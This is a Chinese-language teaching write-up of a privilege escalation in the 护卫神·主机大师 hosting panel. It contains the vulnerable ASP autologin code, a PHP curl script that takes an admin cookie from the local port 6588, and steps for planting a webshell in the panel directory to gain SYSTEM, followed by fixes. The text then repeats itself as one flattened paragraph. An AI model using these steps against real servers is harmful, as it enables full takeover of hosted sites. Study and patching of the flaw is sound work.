护卫神主机大师提权漏洞利用分析教学文档

漏洞概述

护卫神·主机大师是一款支持一键安装网站运行环境(IIS+ASP+ASP.net+PHP5.2-5.6+MySQL+FTP+伪静态+PhpMyAdmin)的虚拟主机管理系统。该系统存在一个本地身份验证绕过漏洞，允许攻击者在已获取低权限webshell的情况下提升至system权限。

漏洞细节

漏洞位置

/admin/index.asp文件中的身份验证逻辑

漏洞代码分析

<%Option Explicit%>
<!--#include file="../conn.asp"-->
<%
Dim strIp
strIp = Request.ServerVariables("local_addr")
Dim strAuto
strAuto = LCase(Trim(Request.QueryString("f")))
If (strIp = "::1" Or strIp = "127.0.0.1") And strAuto = "autologin" Then 
    '获取管理用户登录
    Dim sql,rs
    call conn_open()
    Set rs = Server.CreateObject("Adodb.Recordset")
    sql = "select top 1 * from [huweishen_Admin]"
    rs.Open sql,conn,1,1
    if rs.RecordCount = 0 then
        Session("admin")= "autologin"
    else
        Session("admin") = rs("username")
    end if
    rs.Close
    Session.Timeout =600
    AddLog Session("admin"), 1, "控制台直接登录管理中心"
    Response.Redirect "index.asp"
End If
%>

漏洞原理

系统检查请求来源IP是否为本地(127.0.0.1或::1)
同时检查URL参数f是否为"autologin"
如果满足以上两个条件，则直接登录系统，无需账号密码验证
开发者未考虑内部用户是否合法，导致攻击者可通过低权限webshell伪造本地请求

利用前提

已获取目标主机上的一个低权限webshell
护卫神主机管理系统运行在6588端口
程序路径通常为x:\HwsHostMaster\host\web\
系统以system权限运行

漏洞利用步骤

第一步：验证漏洞存在

通过已有webshell确认护卫神主机大师安装
检查/admin/index.asp文件是否存在上述漏洞代码

第二步：获取管理员cookie

上传以下PHP脚本到服务器并执行：

<?php
function httpGet() {
    $url = 'http://127.0.0.1:6588/admin/index.asp?f=autologin';
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, TRUE); //表示需要response header
    curl_setopt($ch, CURLOPT_NOBODY, TRUE); //表示需要response body
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, FALSE);
    curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
    curl_setopt($ch, CURLOPT_TIMEOUT, 120);
    $result = curl_exec($ch);
    return $result;
}
echo httpGet();
?>

第三步：修改cookie访问后台

从脚本响应中获取管理员cookie
在浏览器中修改cookie
直接访问/admin/index.asp进入后台

第四步：上传webshell获取system权限

进入后台后点击"网站列表"
选择一个网站，点击"解压"进入操作界面
通过FTP或其他方式上传包含webshell的压缩包
输入文件名和解压路径，解压路径设置为护卫神管理系统路径(如X:\HwsHostMaster\host\web\)
使用相对路径指向虚拟主机管理系统web路径
点击解压后，webshell将被解压到管理系统目录下，获得system权限

修复方案

删除/admin/index.asp文件中第3行到第30行之间的漏洞代码
或修改验证逻辑，增加更严格的身份验证机制
不要过度信任本地请求，应对所有管理操作进行严格身份验证

漏洞影响

该漏洞允许低权限用户提升至system权限
攻击者可以完全控制系统上的所有网站和服务
漏洞利用需要先获取低权限webshell，因此影响范围有限

防御建议

及时更新护卫神主机大师到最新版本
定期审计系统代码，特别是身份验证相关部分
实施最小权限原则，限制每个用户的权限
监控系统日志，检测可疑活动
使用Web应用防火墙(WAF)保护管理系统

护卫神主机大师提权漏洞利用分析教学文档漏洞概述护卫神·主机大师是一款支持一键安装网站运行环境(IIS+ASP+ASP.net+PHP5.2-5.6+MySQL+FTP+伪静态+PhpMyAdmin)的虚拟主机管理系统。该系统存在一个本地身份验证绕过漏洞，允许攻击者在已获取低权限webshell的情况下提升至system权限。漏洞细节漏洞位置 /admin/index.asp 文件中的身份验证逻辑漏洞代码分析漏洞原理系统检查请求来源IP是否为本地(127.0.0.1或::1) 同时检查URL参数f是否为"autologin" 如果满足以上两个条件，则直接登录系统，无需账号密码验证开发者未考虑内部用户是否合法，导致攻击者可通过低权限webshell伪造本地请求利用前提已获取目标主机上的一个低权限webshell 护卫神主机管理系统运行在6588端口程序路径通常为 x:\HwsHostMaster\host\web\ 系统以system权限运行漏洞利用步骤第一步：验证漏洞存在通过已有webshell确认护卫神主机大师安装检查 /admin/index.asp 文件是否存在上述漏洞代码第二步：获取管理员cookie 上传以下PHP脚本到服务器并执行：第三步：修改cookie访问后台从脚本响应中获取管理员cookie 在浏览器中修改cookie 直接访问 /admin/index.asp 进入后台第四步：上传webshell获取system权限进入后台后点击"网站列表" 选择一个网站，点击"解压"进入操作界面通过FTP或其他方式上传包含webshell的压缩包输入文件名和解压路径，解压路径设置为护卫神管理系统路径(如 X:\HwsHostMaster\host\web\ ) 使用相对路径指向虚拟主机管理系统web路径点击解压后，webshell将被解压到管理系统目录下，获得system权限修复方案删除 /admin/index.asp 文件中第3行到第30行之间的漏洞代码或修改验证逻辑，增加更严格的身份验证机制不要过度信任本地请求，应对所有管理操作进行严格身份验证漏洞影响该漏洞允许低权限用户提升至system权限攻击者可以完全控制系统上的所有网站和服务漏洞利用需要先获取低权限webshell，因此影响范围有限防御建议及时更新护卫神主机大师到最新版本定期审计系统代码，特别是身份验证相关部分实施最小权限原则，限制每个用户的权限监控系统日志，检测可疑活动使用Web应用防火墙(WAF)保护管理系统